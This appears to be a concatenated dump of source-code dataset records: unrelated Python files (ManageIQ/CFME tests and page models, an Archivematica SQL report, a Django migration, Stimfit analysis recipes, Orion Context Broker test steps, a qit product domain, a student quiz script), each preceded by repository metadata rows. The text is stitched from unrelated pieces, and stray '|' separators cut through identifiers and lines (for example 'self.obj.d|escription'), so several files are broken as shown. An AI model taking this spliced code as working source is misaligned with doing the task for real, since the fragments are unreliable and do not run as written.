from cfme.cloud.provider import CloudProvider
from cfme.cloud.provider.gce import GCEProvider
from cfme.control.explorer.policies import VMControlPolicy
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.kubevirt import KubeVirtProvider
from cfme.markers.env_markers.provider import providers
from cfme.utils.providers import ProviderFilter
from cfme.utils.wait import wait_for
all_prov = ProviderFilter(classes=[InfraProvider, CloudProvider],
required_fields=['provisioning', 'events'])
excluded = ProviderFilter(classes=[KubeVirtProvider], inverted=True)
pytestmark = [
pytest.mark.usefixtures('uses_infra_providers', 'uses_cloud_providers'),
pytest.mark.tier(2),
pytest.mark.provider(gen_func=providers, filters=[all_prov, excluded],
scope='module'),
test_requirements.events,
]
@pytest.fixture(scope="function")
def vm_crud(provider, setup_provider_modscope, small_template_modscope):
template = small_template_modscope
base_name = 'test-events-' if provider.one_of(GCEProvider) else 'test_events_'
vm_name = fauxfactory.gen_alpha(20, start=base_name).lower()
collection = provider.appliance.provider_based_collection(provider)
vm = collection.instantiate(vm_name, provider, template_name=template.name)
yield vm
vm.cleanup_on_provider()
@pytest.mark.rhv2
def test_vm_create(request, appliance, vm_crud, provider, register_event):
""" Test whether vm_create_complete event is emitted.
    Prerequisites:
* A provider that is set up and able to deploy VMs
Steps:
* Create a Control setup (action, policy, profile) that apply a tag on a VM when
``VM Create Complete`` event comes
* Deploy the VM outside of CFME (directly in the provider)
* Refresh provider relationships and wait for VM to appear
* Assert the tag appears.
Metadata:
test_flag: provision, events
Polarion:
assignee: jdupuy
casecomponent: Events
caseimportance: high
initialEstimate: 1/8h
"""
action = appliance.collections.actions.create(
fauxfactory.gen_alpha(),
"Tag",
dict(tag=("My Company Tags", "Environment", "Development")))
request.addfinalizer(action.delete)
policy = appliance.collections.policies.create(
VMControlPolicy,
fauxfactory.gen_alpha()
)
request.addfinalizer(policy.delete)
policy.assign_events("VM Create Complete")
@request.addfinalizer
def _cleanup():
policy.unassign_events("VM Create Complete")
policy.assign_actions_to_event("VM Create Complete", action)
profile = appliance.collections.policy_profiles.create(
fauxfactory.gen_alpha(), policies=[policy])
request.addfinalizer(profile.delete)
provider.assign_policy_profiles(profile.description)
request.addfinalizer(lambda: provider.unassign_policy_profiles(profile.description))
register_event(target_type='VmOrTemplate', target_name=vm_crud.name, event_type='vm_create')
vm_crud.create_on_provider(find_in_cfme=True)
def _check():
return any(tag.category.display_name == "Environment" and tag.display_name == "Development"
for tag in vm_crud.get_tags())
wait_for(_check, num_sec=300, delay=15, message="tags to appear")
|
oturing/pyun
|
pyun_tests.py
|
Python
|
mit
| 373
| 0
|
# coding: utf-8
"""
>>> from pyun import *
>>> yun = YunBridge('192.168.2.9')
>>> yun.pinMode(13, INPUT)
'input'
>>> yun.digitalRead(13)
0
>>> yun.digitalWrite(13, 1)
1
>>> yun.digitalWrite(13, 0)
0
>>> 0 <= yun.analogRead(5) < 1024
True
"""
import doctest
doctest.testmod(optionflags=doctest.REPORT_ONLY_FIRST_FAILURE)
| |
sevein/archivematica
|
src/dashboard/src/components/ingest/views_NormalizationReport.py
|
Python
|
agpl-3.0
| 4,152
| 0.007225
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage Dashboard
# @author Joseph Perry <joseph@artefactual.com>
# @author Justin Simpson <jsimpson@artefactual.com>
from __future__ import print_function
from components import helpers
from django.db import connection
def getNormalizationReportQuery(sipUUID, idsRestriction=""):
if idsRestriction:
idsRestriction = 'AND (%s)' % idsRestriction
cursor = connection.cursor()
# not fetching name of ID Tool, don't think we need it.
sql = """
select
CONCAT(a.currentLocation, ' ', a.fileUUID,' ', IFNULL(a.fileID, "")) AS 'pagingIndex',
a.fileUUID,
a.location,
substring(a.currentLocation,23) as fileName,
a.fileID,
a.description,
a.already_in_access_format,
a.already_in_preservation_format,
        case when c.exitCode < 2 and a.fileID is not null then 1 else 0 end as access_normalization_attempted,
        case when a.fileID is not null and c.exitcode = 1 then 1 else 0 end as access_normalization_failed,
case when b.exitCode < 2 and a.fileID is not null then 1 else 0 end as preservation_normalization_attempted,
case when a.fileID is not null and b.exitcode = 1 then 1 else 0 end as preservation_normalization_failed,
c.taskUUID as access_normalization_task_uuid,
b.taskUUID as preservation_normalization_task_uuid,
c.exitCode as access_task_exitCode,
b.exitCode as preservation_task_exitCode
from (
select
f.fileUUID,
f.sipUUID,
f.originalLocation as location,
f.currentLocation,
fid.uuid as 'fileID',
fid.description,
f.fileGrpUse,
fid.access_format AS 'already_in_access_format',
fid.preservation_format AS 'already_in_preservation_format'
from
Files f
Left Join
FilesIdentifiedIDs fii on f.fileUUID = fii.fileUUID
Left Join
fpr_formatversion fid on fii.fileID = fid.uuid
where
f.fileGrpUse in ('original', 'service')
and f.sipUUID = %s
) a
Left Join (
select
j.sipUUID,
t.fileUUID,
t.taskUUID,
t.exitcode
from
Jobs j
Join
Tasks t on t.jobUUID = j.jobUUID
where
j.jobType = 'Normalize for preservation'
) b
on a.fileUUID = b.fileUUID and a.sipUUID = b.sipUUID
Left Join (
select
j.sipUUID,
t.fileUUID,
t.taskUUID,
t.exitcode
from
Jobs j
join
Tasks t on t.jobUUID = j.jobUUID
Where
j.jobType = 'Normalize for access'
) c
ON a.fileUUID = c.fileUUID AND a.sipUUID = c.sipUUID
WHERE a.sipUUID = %s
order by (access_normalization_failed + preservation_normalization_failed) desc;
"""
cursor.execute(sql, (sipUUID, sipUUID))
objects = helpers.dictfetchall(cursor)
return objects
if __name__ == '__main__':
import sys
uuid = "'%s'" % (sys.argv[1])
print("testing normalization report")
sql = getNormalizationReportQuery(sipUUID=uuid)
print(sql)
|
antoinecarme/pyaf
|
tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_PolyTrend_Seasonal_Minute_NoAR.py
|
Python
|
bsd-3-clause
| 161
| 0.049689
|
import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Integration'] , ['PolyTrend'] , ['Seasonal_Minute'] , ['NoAR'] );
|
Angoreher/xcero
|
magic/migrations/0007_auto_20170928_2258.py
|
Python
|
mit
| 2,691
| 0.004088
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-29 01:58
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('magic', '0006_auto_20170928_2238'),
]
operations = [
migrations.RemoveField(
model_name='card',
name='card_type',
),
migrations.AddField(
model_name='card',
name='card_types',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='archetype',
name='colors',
field=models.ManyToManyField(related_name='archetype_colors', to='magic.Color'),
),
migrations.AlterField(
model_name='card',
name='card_subtypes',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='card',
            name='card_supertypes',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
|
model_name='card',
name='cmc',
field=models.IntegerField(blank=True, null=True, verbose_name='converted mana cost'),
),
migrations.AlterField(
model_name='card',
name='color_identity',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.RemoveField(
model_name='card',
name='colors',
),
migrations.AddField(
model_name='card',
name='colors',
field=models.ManyToManyField(related_name='card_colors', to='magic.Color', verbose_name='colors'),
),
migrations.AlterField(
model_name='card',
name='foreign_names',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='card',
name='power',
field=models.IntegerField(blank=True, null=True, verbose_name='power'),
),
migrations.AlterField(
model_name='card',
name='printings',
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='card',
name='toughness',
field=models.IntegerField(blank=True, null=True, verbose_name='toughness'),
),
]
|
jteehan/cfme_tests
|
cfme/intelligence/chargeback/rates.py
|
Python
|
gpl-2.0
| 9,761
| 0.001332
|
# -*- coding: utf-8 -*-
# Page model for Intel->Chargeback->Rates.
from . import ChargebackView
from cached_property import cached_property
from navmazing import NavigateToSibling, NavigateToAttribute
from utils.appliance import Navigatable
from utils.appliance.implementations.ui import navigator, navigate_to, CFMENavigateStep
from utils.pretty import Pretty
from utils.update import Updateable
from widgetastic.utils import ParametrizedLocator, ParametrizedString
from widgetastic.widget import Text, ParametrizedView
from widgetastic_manageiq import Select
from widgetastic_patternfly import Button, Input, Dropdown
class RatesView(ChargebackView):
title = Text("#explorer_title_text")
@property
def is_displayed(self):
return (
self.in_intel_chargeback and self.configuration.is_displayed and
self.title.text == "Compute Chargeback Rates"
)
configuration = Dropdown('Configuration')
class RatesDetailView(ChargebackView):
title = Text("#explorer_title_text")
@property
def is_displayed(self):
return (
self.in_intel_chargeback and self.configuration.is_displayed and
self.title.text == 'Compute Chargeback Rate "{}"'.format(
self.context["object"].description) and
self.rates.is_opened and
self.rates.tree.currently_selected == [
"Compute Chargeback Rates",
self.context["object"].description
]
)
configuration = Dropdown('Configuration')
class AddComputeChargebackView(RatesView):
title = Text('#explorer_title_text')
description = Input(id='description')
currency = Select(id='currency')
@ParametrizedView.nested
class fields(ParametrizedView): # noqa
PARAMETERS = ('name',)
ROOT = ParametrizedLocator('.//tr[./td[contains(normalize-space(.), {name|quote})]]')
@cached_property
def row_id(self):
attr = self.browser.get_attribute(
'id',
'./td/select[starts-with(@id, "per_time_")]',
parent=self)
return int(attr.rsplit('_', 1)[-1])
@cached_property
def sub_row_id(self):
attr = self.browser.get_attribute(
'id',
'./td/input[starts-with(@id, "fixed_rate_")]',
parent=self)
return int(attr.rsplit('_', 1)[-1])
per_time = Select(id=ParametrizedString('per_time_{@row_id}'))
per_unit = Select(id=ParametrizedString('per_unit_{@row_id}'))
start = Input(id=ParametrizedString('start_{@row_id}_{@sub_row_id}'))
finish = Input(id=ParametrizedString('finish_{@row_id}_{@sub_row_id}'))
fixed_rate = Input(id=ParametrizedString('fixed_rate_{@row_id}_{@sub_row_id}'))
variable_rate = Input(id=ParametrizedString('variable_rate_{@row_id}_{@sub_row_id}'))
action_add = Button(title='Add a new tier')
action_delete = Button(title='Remove the tier')
add_button = Button(title='Add')
cancel_button = Button(title='Cancel')
@property
def is_displayed(self):
return (
self.in_explorer and
self.title.text == 'Compute Chargeback Rates' and
self.description.is_displayed)
class EditComputeChargebackView(AddComputeChargebackView):
save_button = Button(title='Save Changes')
reset_button = Button(title='Reset Changes')
@property
def is_displayed(self):
return (
self.in_explorer and
self.title.text == 'Compute Chargeback Rate "{}"'.format(self.obj.description))
class StorageChargebackView(RatesView):
@property
def is_displayed(self):
return (
self.in_chargeback and
self.title.text == 'Storage Chargeback Rates')
class AddStorageChargebackView(AddComputeChargebackView):
@property
def is_displayed(self):
return (
self.in_explorer and
self.title.text == 'Storage Chargeback Rates' and
self.description.is_displayed)
class EditStorageChargebackView(EditComputeChargebackView):
@property
def is_displayed(self):
return (
self.in_explorer and
self.title.text == 'Storage Chargeback Rate "{}"'.format(self.obj.d
|
escription))
class ComputeRate(Updateable, Pretty, Navigatable):
"""This class represents a Compute Chargeback rate.
Example:
.. code-block:: python
>>> import cfme.intelligence.chargeback.rates as rates
>>> rate = rates.ComputeRate(description=desc,
fields={'Used CPU':
{'per_time': 'Hourly', 'variable_rate': '3'},
|
'Used Disk I/O':
{'per_time': 'Hourly', 'variable_rate': '2'},
'Used Memory':
{'per_time': 'Hourly', 'variable_rate': '2'}})
>>> rate.create()
>>> rate.delete()
Args:
description: Rate description
currency: Rate currency
fields : Rate fields
"""
pretty_attrs = ['description']
def __init__(self, description=None,
currency=None,
fields=None,
appliance=None,
):
Navigatable.__init__(self, appliance=appliance)
self.description = description
self.currency = currency
self.fields = fields
def __getitem__(self, name):
return self.fields.get(name)
def create(self):
# Create a rate in UI
view = navigate_to(self, 'New')
view.fill_with({'description': self.description,
'currency': self.currency,
'fields': self.fields},
on_change=view.add_button,
no_change=view.cancel_button)
view.flash.assert_success_message('Chargeback Rate "{}" was added'.format(
self.description))
def update(self, updates):
# Update a rate in UI
view = navigate_to(self, 'Edit')
view.fill_with(updates,
on_change=view.save_button,
no_change=view.cancel_button)
view.flash.assert_success_message('Chargeback Rate "{}" was saved'.format(
updates.get('description')))
def delete(self):
# Delete a rate in UI
view = navigate_to(self, 'Details')
view.configuration.item_select('Remove from the VMDB', handle_alert=True)
view.flash.assert_success_message('Chargeback Rate "{}": Delete successful'.format(
self.description))
class StorageRate(ComputeRate):
# Methods and form for this are similar to that of ComputeRate, but navigation is different
# from that of ComputeRate.
pretty_attrs = ['description']
@navigator.register(ComputeRate, 'All')
class ComputeRateAll(CFMENavigateStep):
VIEW = RatesView
prerequisite = NavigateToAttribute('appliance.server', 'IntelChargeback')
def step(self):
self.prerequisite_view.navigation.select('Cloud Intel', 'Chargeback')
self.view.rates.tree.click_path(
"Rates",
"Compute"
)
@navigator.register(ComputeRate, 'New')
class ComputeRateNew(CFMENavigateStep):
VIEW = AddComputeChargebackView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.navigation.select('Cloud Intel', 'Chargeback')
self.view.configuration.item_select("Add a new Chargeback Rate")
@navigator.register(ComputeRate, 'Details')
class ComputeRateDetails(CFMENavigateStep):
VIEW = RatesDetailView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.navigation.select('Cloud Intel', 'Chargeback')
self.view.rates.tree.click_path(
"Rates",
"Compute", self.obj.description
)
@navigator.register(ComputeRate, 'Edit')
class ComputeRateEdit(CFMENavigateStep):
VIEW = EditComputeChargebackView
prerequisite = NavigateToSibling('Details')
def step(self):
|
jaejun1679-cmis/jaejun1679-cmis-cs2
|
cs2quiz2.py
|
Python
|
cc0-1.0
| 2,209
| 0.024898
|
#PART 1: Terminology
#1) Give 3 examples of boolean expressions.
#a) "apple" == "apple"
#b) 1 != 1
#c) 5 >= 6
#2) What does 'return' do?
#'Return' returns a value. It can be used after a calculation is
#executed. When the Python interpreter solves a math problem, you can
#"return" the value back into the interpreter so you can see it (no pun
#intended). x
#3) What are 2 ways indentation is important in python code?
#a) Indentation is important because it tells specific lines of code where it b
|
elongs in a certain function.
#b) And the correct indentation level tells Python when a specific function ends. (See the small example sketched below.)
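#   Illustrative sketch (not part of the original quiz answers): a tiny
#   hypothetical function showing both points above -- the indented line
#   belongs to the function body, and 'return' hands the computed value
#   back to the caller.
#       def square(x):
#           return x * x
#       result = square(3)   # result is 9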
#PART 2: Reading
#Type the values for 9 of the 12 of the variables below.
#
#problem1_a) 36
#problem1_b) square root of 3
#problem1_c) square root of 0 = 0
#problem1_d) -5
#
#problem2
|
_a) True
#problem2_b) False
#problem2_c) False
#problem2_d) False x
#
#problem3_a) 0.3
#problem3_b) 0.5
#problem3_c) 0.5
#problem3_d) 0.5
#
#problem4_a) 7
#problem4_b) 5
#problem4_c) 0.125
#problem4_d) 4.5
#
#PART 3: Programming
#Write a script that asks the user to type in 3 different numbers.
#If the user types 3 different numbers the script should then print out the
#largest of the 3 numbers.
#If they don't, it should print a message telling them they didn't follow
#the directions.
#Be sure to use the program structure you've learned (main function, processing function, output function)
def output(num1, num2, num3): #printing only if the numbers meet the given boolean expressions
if num1 > num2 and num1 > num3:
print """
The greatest number is {}
""".format(num1)
elif num2 > num1 and num2 > num3:
print """
The greatest number is {}
""".format(num2)
elif num3 > num1 and num3 > num2:
print """
The greatest number is {}
""".format(num3)
elif num1 == num2 == num3:
print """
You did not follow directions.
"""
def main():
print "Please type in three different numbers." #simple directions givens
num1 = float(raw_input("Number 1: ")) #raw input of user's desired numbers.
num2 = float(raw_input("Number 2: "))
num3 = float(raw_input("Number 3: "))
output(num1, num2, num3)
main() #main function to execute my script
#29, 31
|
gavioto/fiware-orion
|
test/acceptance/lettuce/integration/steps_lib/ngsi_request.py
|
Python
|
agpl-3.0
| 5,069
| 0.004933
|
# -*- coding: utf-8 -*-
"""
# Copyright 2015 Telefonica Investigacion y Desarrollo, S.A.U
#
|
# This file is part of Orion Context Broker.
#
# Orion Context Broker is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Orion Context Broker is distributed in
|
the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero
# General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Orion Context Broker. If not, see http://www.gnu.org/licenses/.
#
# For those usages not covered by this license please contact with
# iot_support at tid dot es
"""
__author__ = 'Jon Calderin Goñi (jon.caldering@gmail.com)'
from lettuce import step, world
@step('a standard context entity creation is asked with the before information')
def a_standard_context_entity_Creation_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_entity_creation(
world.payloads[world.payloads_count])
@step('a standard context entity update is asked with the before information')
def a_standard_context_entity_update_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_entity_update(
world.payloads[world.payloads_count])
@step('a standard context entity delete is asked with the before information')
def a_standard_context_entity_delete_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_entity_delete(
world.payloads[world.payloads_count])
@step('a standard query context is asked with the before information')
def a_standard_query_context_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_query_context(
world.payloads[world.payloads_count])
@step('a standard context subscription is asked with the before information')
def a_standard_context_subscription_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].standard_subscribe_context_ontime(
world.payloads[world.payloads_count])
# NGSI 9
@step('a standard context registration is asked with the before information')
def a_standard_context_registration_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].register_context(
world.payloads[world.payloads_count])
@step('a standard disconver context availability is asked with the before information')
def a_standard_discover_context_availability_is_asked_with_the_before_information(step):
world.responses[world.response_count] = world.cb[world.cb_count].discover_context_availability(
world.payloads[world.payloads_count])
# ***************
# Convenience
@step('a convenience query context is asked with the following data')
def a_convenience_query_context_is_asked_with_the_following_data(step):
"""
Execute a convenience query context with the information in the table. The format is:
    | entity_id(optional) | entity_type(optional) | attribute(optional) |
:param step:
:return:
"""
rows = len(step.hashes)
if rows != 1:
        raise ValueError('The table for this step has to have only 1 row but it has {rows}'.format(rows=rows))
kargs = dict()
if 'entity_id' in step.hashes[0]:
kargs.update({'entity_id': step.hashes[0]['entity_id']})
if 'entity_type' in step.hashes[0]:
kargs.update({'entity_type': step.hashes[0]['entity_type']})
if 'attribute' in step.hashes[0]:
kargs.update({'attribute': step.hashes[0]['attribute']})
world.responses[world.response_count] = world.cb[world.cb_count].convenience_query_context(**kargs)
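# Illustrative sketch (assumption, not part of the original steps module): in a
# .feature file this step could be driven by a one-row table such as
#     When a convenience query context is asked with the following data
#       | entity_id | entity_type |
#       | Room1     | Room        |
# where the values "Room1" and "Room" are purely hypothetical examples.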
@step('a convenience delete context is asked with the following data')
def a_convenience_delete_entity_is_asked_with_the_following_information(step):
"""
    Execute a convenience delete context with the information in the table. The format is:
| entity_id | entity_type(optional) |
:param step:
:return:
"""
rows = len(step.hashes)
if rows != 1:
        raise ValueError('The table for this step has to have only 1 row but it has {rows}'.format(rows=rows))
kargs = dict()
if 'entity_id' in step.hashes[0]:
kargs.update({'entity_id': step.hashes[0]['entity_id']})
else:
raise ValueError('The entity_id is mandatory. Table: {table}'.format(table=step.hashes))
if 'entity_type' in step.hashes[0]:
kargs.update({'entity_type': step.hashes[0]['entity_type']})
world.responses[world.response_count] = world.cb[world.cb_count].convenience_entity_delete_url_method(**kargs)
|
JoseGuzman/stimfit
|
src/stimfit/py/spells.py
|
Python
|
gpl-2.0
| 18,106
| 0.011046
|
"""
spells.py
Python recipes to solve frequently requested tasks with Stimfit.
You can find a complete description of these functions in the
Stimfit online documentation (http://www.stimfit.org/doc/sphinx/index.html)
Check "The Stimfit Book of Spells" for details.
Authors: Jose Guzman, Alois Schloegl and Christoph Schmidt-Hieber
Last change: Tue Dec 16 10:50:15 CET 2014
"""
import numpy as np
# stimfit python module:
import stf
import wx # see APFrame class
import wx.grid # see APFrame class
from math import ceil, floor
def resistance( base_start, base_end, peak_start, peak_end, amplitude):
"""Calculates the resistance from a series of voltage clamp traces.
Keyword arguments:
base_start -- Starting index (zero-based) of the baseline cursors.
base_end -- End index (zero-based) of the baseline cursors.
peak_start -- Starting index (zero-based) of the peak cursors.
peak_end -- End index (zero-based) of the peak cursors.
amplitude -- Amplitude of the voltage command.
Returns:
The resistance.
"""
if not stf.check_doc():
print('Couldn\'t find an open file; aborting now.')
return 0
#A temporary array to calculate the average:
array = np.empty( (stf.get_size_channel(), stf.get_size_trace()) )
for n in range( 0, stf.get_size_channel() ):
        # Add this trace to the array:
array[n] = stf.get_trace( n )
# calculate average and create a new section from it:
    stf.new_window( np.average(array, 0) )
# set peak cursors:
# -1 means all points within peak window.
if not stf.set_peak_mean(-1):
return 0
if not stf.set_peak_start(peak_start):
return 0
if not stf.set_peak_end(peak_end):
return 0
# set base cursors:
if not stf.set_base_start(base_start):
return 0
if not stf.set_base_end(base_end):
return 0
# measure everything:
stf.measure()
# calculate r_seal and return:
return amplitude / (stf.get_peak()-stf.get_base())
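# Hedged usage sketch (assumption, not part of the original module): with the
# baseline cursors on samples 0-199, the peak cursors on samples 1000-1199 and
# a -5 mV command step, the seal resistance could be estimated as
#     r_seal = resistance(0, 199, 1000, 1199, -0.005)
# (all index values here are hypothetical and depend on the recording).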
def rmean(binwidth, trace=-1, channel=-1):
"""
Calculates a runn
|
ing mean of a single trace
Arguments:
binwidth -- size of the bin in sampling points (pt).
Obviously, it should be smaller than the length of the trace.
trace: -- ZERO-BASED index of the trace within the channel.
Note that this is one less than what is shown in the drop-down box.
The default value of -1 returns the currently displayed trace.
channel -- ZERO-BASED index of the channel. This is independent
of whether a channel is a
|
ctive or not. The default value of -1
returns the currently active channel.
Returns:
A smoothed traced in a new stf window.
"""
# loads the current trace of the channel in a 1D Numpy Array
sweep = stf.get_trace(trace, channel)
# creates a destination python list to append the data
dsweep = np.empty((len(sweep)))
# running mean algorithm
for i in range(len(sweep)):
if (len(sweep)-i) > binwidth:
# append to list the running mean of `binwidth` values
# np.mean(sweep) calculates the mean of list
dsweep[i] = np.mean( sweep[i:(binwidth+i)] )
else:
# use all remaining points for the average:
dsweep[i] = np.mean( sweep[i:] )
stf.new_window(dsweep)
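# Hedged usage sketch (assumption, not part of the original module): a running
# mean over 10 sampling points of the currently displayed trace could be shown
# in a new window with
#     rmean(10)
# and rmean(10, trace=3, channel=0) would smooth the fourth trace of the first
# channel instead (indices are zero-based, as documented above).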
def get_amplitude(base, peak, delta, trace=None):
""" Calculates the amplitude deviation (peak-base) in units of the Y-axis
Arguments:
base -- Starting point (in ms) of the baseline cursor.
peak -- Starting point (in ms) of the peak cursor.
delta -- Time interval to calculate baseline/find the peak.
trace -- Zero-based index of the trace to be processed, if None then current
trace is computed.
Returns:
    A float with the variation of the amplitude, or False if the cursors are
    out of range or the trace index is invalid.
Example:
    get_amplitude(980,1005,10,i) returns the variation of the Y unit of the
    trace i between the peak window (1005+10) msec and the baseline window
    (980+10) msec
"""
# sets the current trace or the one given in trace
if trace is None:
sweep = stf.get_trace_index()
else:
if type(trace) != int:
            print('trace argument admits only integers')
return False
sweep = trace
# set base cursors:
if not(stf.set_base_start(base, True)):
return False # out-of range
if not(stf.set_base_end(base+delta, True)):
return False
# set peak cursors:
if not(stf.set_peak_start(peak, True)):
return False # out-of range
if not(stf.set_peak_end(peak+delta, True)):
return False
# update measurements
stf.set_trace(sweep)
amplitude = stf.get_peak()-stf.get_base()
return amplitude
def cut_sweeps(start, delta, sequence=None):
"""
    Cuts a sequence of traces and presents them in a new window.
Arguments:
start -- starting point (in ms) to cut.
delta -- time interval (in ms) to cut
sequence -- list of indices to be cut. If None, every trace in the
channel will be cut.
Returns:
    A new window with the cut traces.
Examples:
cut_sweeps(200,300) cut the traces between t=200 ms and t=500 ms
within the whole channel.
cut_sweeps(200,300,range(30,60)) the same as above, but only between
traces 30 and 60.
cut_sweeps(200,300,stf.get_selected_indices()) cut between 200 ms and 500 ms only in the selected traces.
"""
    # select every trace in the channel if no selection is given in sequence
if sequence is None:
sequence = range(stf.get_size_channel())
# transform time into sampling points
dt = stf.get_sampling_interval()
pstart = int( round(start/dt) )
pdelta = int( round(delta/dt) )
# creates a destination python list
dlist = [ stf.get_trace(i)[pstart:(pstart+pdelta)] for i in sequence ]
return stf.new_window_list(dlist)
def count_events(start, delta, threshold=0, up=True, trace=None, mark=True):
"""
    Counts the number of events (e.g. action potentials (APs)) in the current trace.
Arguments:
start -- starting time (in ms) to look for events.
delta -- time interval (in ms) to look for events.
threshold -- (optional) detection threshold (default = 0).
up -- (optional) True (default) will look for upward events,
False downwards.
trace -- (optional) zero-based index of the trace in the current
channel, if None, the current trace is selected.
mark -- (optional) if True (default), set a mark at the point
of threshold crossing
Returns:
An integer with the number of events.
Examples:
count_events(500,1000) returns the number of events found between t=500
ms and t=1500 ms above 0 in the current trace and shows a stf
marker.
    count_events(500,1000,-10,False,i) returns the number of events found
below -10 in the trace i and shows the corresponding stf markers.
"""
# sets the current trace or the one given in trace.
if trace is None:
sweep = stf.get_trace_index()
else:
if type(trace) !=int:
print('trace argument admits only integers')
return False
sweep = trace
# set the trace described in sweep
stf.set_trace(sweep)
# transform time into sampling points
dt = stf.get_sampling_interval()
pstart = int( round(start/dt) )
pdelta = int( round(delta/dt) )
# select the section of interest within the trace
selection = stf.get_trace()[pstart:(pstart+pdelta)]
# algorithm to detect events
event_counter, i = 0, 0 # set counter and index to zero
# choose comparator according to direction:
if up:
comp = lambda a, b: a > b
else:
comp = lambda a, b: a < b
# run the loop
while i < len(selection):
if comp(selection[i], threshold):
event_counter += 1
if mark:
stf.set_marker(pstart+i, se
|
spirali/qit
|
src/qit/domains/product.py
|
Python
|
gpl-3.0
| 3,854
| 0.002076
|
from qit.base.bool import Bool
from qit.base.struct import Struct
from qit.domains.domain import Domain
from qit.domains.iterator import Iterator
from qit.base.function import Function
from qit.functions.int import multiplication_n
class Product(Domai
|
n):
""" Cartesian product of domains """
def __init__(self, *args):
domains = []
struct_args = []
for arg in args:
if isinstance(arg, tuple) and len(arg) == 2:
domain
|
= arg[0]
domains.append(domain)
struct_args.append((domain.type, arg[1]))
else:
domains.append(arg)
struct_args.append(arg.type)
type = Struct(*struct_args)
super().__init__(
type,
self._make_iterator(type, domains),
self._make_generator(type, domains),
self._make_size(domains),
self._make_indexer(domains))
self.domains = tuple(domains)
def _make_iterator(self, type, domains):
iterators = [ d.iterator for d in domains ]
if all(iterators):
return ProductIterator(type, iterators)
def _make_generator(self, type, domains):
generators = tuple(d.generator for d in domains)
if all(generators):
generator = Function(("generator", self.name)).returns(type).code("""
return {
{% for g in _generators %}
{{b(g)}}{% if not loop.last %},{% endif %}
{% endfor %}
};
""", _generators=generators).uses(generators)
return generator()
def _make_size(self, domains):
sizes = [ d.size for d in domains ]
if all(sizes):
return multiplication_n(len(sizes))(*sizes)
def _make_indexer(self, domains):
indexers = [ d.indexer for d in domains ]
if all(indexers):
"""
indexer = FunctionWithExprs(start=start, step=step).returns(Int())
indexer.takes(Int(), "_v")
indexer.code("return (_v - {start}) / {step};")
"""
def __mul__(self, other):
args = list(zip(self.domains, self.type.names))
args.append(other)
return Product(*args)
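# Hedged usage sketch (assumption, not part of the original module): assuming a
# one-dimensional domain type such as qit's Range is available, a grid of pairs
# could be built with
#     grid = Product(Range(3), Range(4))   # pairs (i, j) with 0 <= i < 3, 0 <= j < 4
#     cube = grid * Range(2)               # __mul__ above appends another factor
# (Range is used here only as a hypothetical example of a domain.)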
class ProductIterator(Iterator):
def __init__(self, struct, iterators):
iters = tuple(zip(struct.names, iterators))
itype = Struct(*((i.itype, name) for name, i in iters))
objects = set()
for i in iterators:
objects.update(i.childs)
objects = tuple(objects)
super().__init__(itype, struct)
self.reset_fn.code("""
{%- for name, i in _iters %}
{{b(i.reset_fn)}}(iter.{{name}});
{%- endfor %}
""", _iters=iters, struct=struct).uses(objects)
self.next_fn.code("""
{%- for name, i in _iters[:-1] %}
{{ b(i.next_fn) }}(iter.{{name}});
if ({{ b(i.is_valid_fn) }}(iter.{{name}})) {
return;
} else {
{{b(i.reset_fn)}}(iter.{{name}});
}
{%- endfor %}
{{ b(_iters[-1][1].next_fn) }}(iter.{{_iters[-1][0]}});
""", _iters=iters).uses(objects)
self.is_valid_fn.code("""
{%- for name, i in _iters %}
if (!({{b(i.is_valid_fn)}}(iter.{{name}}))) {
return false;
}
{%- endfor %}
return true;
""", _iters=iters).uses(objects)
self.value_fn.code("""
return {
{%- for name, i in _iters %}
{{b(i.value_fn)}}(iter.{{name}})
{% if not loop.last %},{% endif %}
{%- endfor %}
};
""", _iters=iters, struct=struct).uses(objects)
|
lonnen/socorro
|
webapp-django/crashstats/authentication/management/commands/auditgroups.py
|
Python
|
mpl-2.0
| 4,373
| 0.000686
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
